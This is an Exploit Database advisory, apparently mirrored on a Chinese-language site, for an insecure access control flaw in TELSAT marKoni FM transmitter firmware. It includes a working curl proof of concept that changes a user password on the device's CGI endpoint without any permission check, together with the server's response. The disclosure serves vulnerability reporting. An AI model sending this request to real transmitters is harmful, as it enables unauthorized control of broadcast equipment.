TELSAT marKoni FM Transmitter 1.9.5 – Insecure Access Control Change Password

• Exploit Database
• 43 阅读

• 作者： LiquidWorm
  日期： 2024-03-18
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51908/

• TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password
  
  
  Vendor: TELSAT Srl
  Product web page: https://www.markoni.it
  Affected version: Markoni-D (Compact) FM Transmitters
  Markoni-DH (Exciter+Amplifiers) FM Transmitters
  Markoni-A (Analogue Modulator) FM Transmitters
  Firmware: 1.9.5
  1.9.3
  1.5.9
  1.4.6
  1.3.9
  
  Summary: Professional FM transmitters.
  
  Desc: Unauthorized user could exploit this vulnerability to change
  his/her password, potentially gaining unauthorized access to sensitive
  information or performing actions beyond her/his designated permissions.
  
  Tested on: GNU/Linux 3.10.53 (armv7l)
   icorem6solox
   lighttpd/1.4.33
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  Macedonian Information Security Research and Development Laboratory
  Zero Science Lab - https://www.zeroscience.mk - @zeroscience
  
  
  Advisory ID: ZSL-2024-5811
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php
  
  
  10.11.2023
  
  --
  
  
  PoC request of a user changing his own password.
  Only admin can edit users. No permissions or Cookie check.
  
  $ curl -s -H "Cookie: name=user-1702119917" \
  http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t
  
  HTTP/1.1 200 OK
  Content-type: text/html
  Cache-control: no-cache
  Set-Cookie: name=user-1702119917; max-age=315360000
  Transfer-Encoding: chunked
  Date: Sat, 9 Dec 2023 11:05:17 GMT
  Server: lighttpd/1.4.33
  
  oc=4&resp=0